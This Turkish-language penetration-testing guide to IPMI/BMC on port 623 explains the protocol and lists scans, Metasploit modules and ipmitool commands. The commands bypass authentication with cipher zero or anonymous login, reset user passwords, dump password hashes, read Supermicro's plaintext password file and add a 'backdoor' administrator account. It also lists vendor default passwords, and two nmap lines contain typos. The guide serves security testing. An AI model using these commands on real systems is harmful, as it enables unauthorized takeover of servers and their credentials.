623/UDP/TCP - IPMI

Reading time: 7 minutes

623/UDP/TCP - IPMI

Temel Bilgiler

IPMI Genel Bakış

Akıllı Platform Yönetim Arayüzü (IPMI), işletim sisteminden veya güç durumundan bağımsız olarak bilgisayar sistemlerinin uzaktan yönetimi ve izlenmesi için standart bir yaklaşım sunar. Bu teknoloji, sistem yöneticilerinin sistemleri uzaktan yönetmelerine olanak tanır, hatta sistem kapalı veya yanıt vermediğinde bile, ve özellikle şunlar için faydalıdır:

• OS öncesi önyükleme yapılandırmaları
• Güç kapalı yönetimi
• Sistem arızalarından kurtarma

IPMI, sıcaklıkları, voltajları, fan hızlarını ve güç kaynaklarını izleme yeteneğine sahiptir, ayrıca envanter bilgileri sağlama, donanım günlüklerini gözden geçirme ve SNMP aracılığıyla uyarılar gönderme işlevi de vardır. İşlemi için gerekli olanlar bir güç kaynağı ve bir LAN bağlantısıdır.

1998'de Intel tarafından tanıtıldığından beri, IPMI birçok satıcı tarafından desteklenmiş, uzaktan yönetim yeteneklerini artırmıştır, özellikle 2.0 sürümünün LAN üzerinden seri desteği ile. Ana bileşenler şunlardır:

• Ana Kart Yönetim Kontrolcüsü (BMC): IPMI işlemleri için ana mikro denetleyici.
• İletişim Araçları ve Arayüzleri: ICMB, IPMB ve yerel ve ağ bağlantıları için çeşitli arayüzler dahil olmak üzere iç ve dış iletişim için.
• IPMI Belleği: Günlükleri ve verileri depolamak için.

Varsayılan Port: 623/UDP/TCP (Genellikle UDP'de bulunur ama TCP'de de çalışıyor olabilir)

Sayım

Keşif

nmap -n -p 623 10.0.0./24
nmap -n-sU -p 623 10.0.0./24
use  auxiliary/scanner/ipmi/ipmi_version

Sürümü belirleyebilirsiniz:

use auxiliary/scanner/ipmi/ipmi_version
nmap -sU --script ipmi-version -p 623 10.10.10.10

IPMI Açıkları

IPMI 2.0 alanında, Dan Farmer tarafından önemli bir güvenlik açığı keşfedildi ve bu açık cipher type 0 aracılığıyla ortaya çıktı. Bu zayıflık, Dan Farmer'ın araştırmasında ayrıntılı olarak belgelenmiştir ve geçerli bir kullanıcı hedef alındığında herhangi bir şifre ile yetkisiz erişim sağlar. Bu zayıflık, HP, Dell ve Supermicro gibi üreticilerin çeşitli BMC'lerinde bulundu ve tüm IPMI 2.0 uygulamalarında yaygın bir sorun olduğunu göstermektedir.

Cipher 0 ile IPMI Kimlik Doğrulama Atlatma

Bu açığı tespit etmek için aşağıdaki Metasploit yardımcı tarayıcısı kullanılabilir:

use auxiliary/scanner/ipmi/ipmi_cipher_zero

Bu açığın istismarı, aşağıda gösterildiği gibi ipmitool ile mümkündür ve kullanıcı şifrelerinin listelenmesi ve değiştirilmesine olanak tanır:

apt-get install ipmitool # Installation command
ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user list # Lists users
ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user set password 2 abc123 # Changes password

IPMI 2.0 RAKP Kimlik Doğrulama Uzak Şifre Hash Alma

Bu zafiyet, mevcut herhangi bir kullanıcı adı için tuzlu hashlenmiş şifrelerin (MD5 ve SHA1) alınmasını sağlar. Bu zafiyeti test etmek için Metasploit bir modül sunar:

msf > use auxiliary/scanner/ipmi/ipmi_dumphashes

IPMI Anonim Kimlik Doğrulama

Birçok BMC'deki varsayılan yapılandırma, boş kullanıcı adı ve şifre dizeleri ile karakterize edilen "anonim" erişime izin verir. Bu yapılandırma, ipmitool kullanarak adlandırılmış kullanıcı hesaplarının şifrelerini sıfırlamak için istismar edilebilir:

ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user list
ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user set password 2 newpassword

Supermicro IPMI Düz Metin Parolaları

IPMI 2.0'daki kritik bir tasarım tercihi, kimlik doğrulama amaçları için BMC'lerde düz metin parolalarının depolanmasını gerektirir. Supermicro'nun bu parolaları /nv/PSBlock veya /nv/PSStore gibi yerlerde depolaması, önemli güvenlik endişeleri doğurmaktadır:

cat /nv/PSBlock

Supermicro IPMI UPnP Açığı

Supermicro'nun IPMI firmware'ında, özellikle UDP port 1900'de bir UPnP SSDP dinleyicisi bulundurması, ciddi bir güvenlik riski oluşturur. Rapid7'nin açıklamasında detaylandırıldığı gibi, UPnP Cihazları için Intel SDK sürüm 1.3.1'deki açıklar, BMC'ye root erişimi sağlar:

msf> use exploit/multi/upnp/libupnp_ssdp_overflow

Brute Force

HP, üretim sırasında varsayılan şifreyi rastgele belirler ve bu, Integrated Lights Out (iLO) ürünleri için geçerlidir. Bu uygulama, genellikle statik varsayılan kimlik bilgileri kullanan diğer üreticilerle tezat oluşturur. Çeşitli ürünler için varsayılan kullanıcı adları ve şifrelerin özeti aşağıda verilmiştir:

• HP Integrated Lights Out (iLO), varsayılan şifre olarak fabrika tarafından rastgele oluşturulmuş 8 karakterli bir dize kullanır ve bu, daha yüksek bir güvenlik seviyesini gösterir.
• Dell'in iDRAC, IBM'in IMM ve Fujitsu'nun Entegre Uzaktan Yönetim Kontrolörü gibi ürünler, sırasıyla "calvin", "PASSW0RD" (sıfır ile) ve "admin" gibi kolay tahmin edilebilir şifreler kullanır.
• Benzer şekilde, Supermicro IPMI (2.0), Oracle/Sun ILOM ve ASUS iKVM BMC de "ADMIN", "changeme" ve "admin" gibi basit varsayılan kimlik bilgileri kullanmaktadır.

Accessing the Host via BMC

Baseboard Management Controller (BMC) üzerinden yönetimsel erişim, ana bilgisayarın işletim sistemine erişim için çeşitli yollar açar. Basit bir yaklaşım, BMC'nin Klavye, Video, Fare (KVM) işlevselliğini kullanmaktır. Bu, ana bilgisayarı GRUB üzerinden bir root shell'e yeniden başlatarak (init=/bin/sh kullanarak) veya kurtarma diski olarak ayarlanmış sanal bir CD-ROM'dan başlatarak yapılabilir. Bu yöntemler, ana bilgisayarın diskini doğrudan manipüle etmeye, arka kapılar eklemeye, veri çıkarmaya veya güvenlik değerlendirmesi için gerekli herhangi bir eylemi gerçekleştirmeye olanak tanır. Ancak, bu ana bilgisayarın yeniden başlatılmasını gerektirir, bu da önemli bir dezavantajdır. Yeniden başlatmadan, çalışan ana bilgisayara erişim daha karmaşık hale gelir ve ana bilgisayarın yapılandırmasına bağlı olarak değişir. Ana bilgisayarın fiziksel veya seri konsolu oturum açmış durumda kalırsa, BMC'nin KVM veya seri üzerinden LAN (sol) işlevselliği aracılığıyla ipmitool kullanılarak kolayca ele geçirilebilir. Paylaşılan donanım kaynaklarının, örneğin i2c veri yolu ve Super I/O çipi gibi, istismarını araştırmak, daha fazla inceleme gerektiren bir alandır.

Introducing Backdoors into BMC from the Host

BMC ile donatılmış bir ana bilgisayarı ele geçirdikten sonra, yerel BMC arayüzü kullanılarak bir arka kapı kullanıcı hesabı eklenebilir, bu da sunucuda kalıcı bir varlık oluşturur. Bu saldırı, ele geçirilen ana bilgisayarda ipmitool bulunmasını ve BMC sürücü desteğinin etkinleştirilmesini gerektirir. Aşağıdaki komutlar, kimlik doğrulama gereksinimini atlayarak ana bilgisayarın yerel arayüzü kullanılarak BMC'ye yeni bir kullanıcı hesabının nasıl enjekte edilebileceğini göstermektedir. Bu teknik, Linux, Windows, BSD ve hatta DOS dahil olmak üzere geniş bir işletim sistemi yelpazesine uygulanabilir.

ipmitool user list
ID  Name        Callin  Link Auth    IPMI Msg  Channel Priv Limit
2  ADMIN            true    false      false      Unknown (0x00)
3  root            true    false      false      Unknown (0x00)

ipmitool user set name 4 backdoor
ipmitool user set password 4 backdoor
ipmitool user priv 4 4
ipmitool user list
ID  Name        Callin  Link Auth    IPMI Msg  Channel Priv Limit
2  ADMIN            true    false      false      Unknown (0x00)
3  root            true    false      false      Unknown (0x00)
4  backdoor        true    false      true      ADMINISTRATOR

Shodan

• port:623

Referanslar

• https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/